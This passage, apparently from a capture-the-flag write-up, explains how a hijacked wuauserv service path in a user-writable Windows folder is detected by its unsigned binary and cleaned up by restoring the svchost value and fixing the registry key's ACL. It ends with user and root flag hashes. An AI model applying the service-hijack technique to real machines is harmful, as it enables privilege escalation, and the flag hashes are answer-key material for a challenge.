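Note that a location check alone would pass the hijacked wuauserv, since C:\windows\system32\spool\drivers\color is under %SystemRoot% despite being writable by ordinary users; the NotSigned result is what catches it. Cleaning up means writing the original value back (C:\Windows\system32\svchost.exe -k netsvcs -p, as shown in the Get-ItemProperty output earlier) and fixing the key's ACL, otherwise the next user with FullControl simply does it again.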
user=>d8782dd01fb15b72c4b5ba77ef2d472b root=>8f8613f5b4da391f36ef11def4cec1b1
Author : Puckiestyle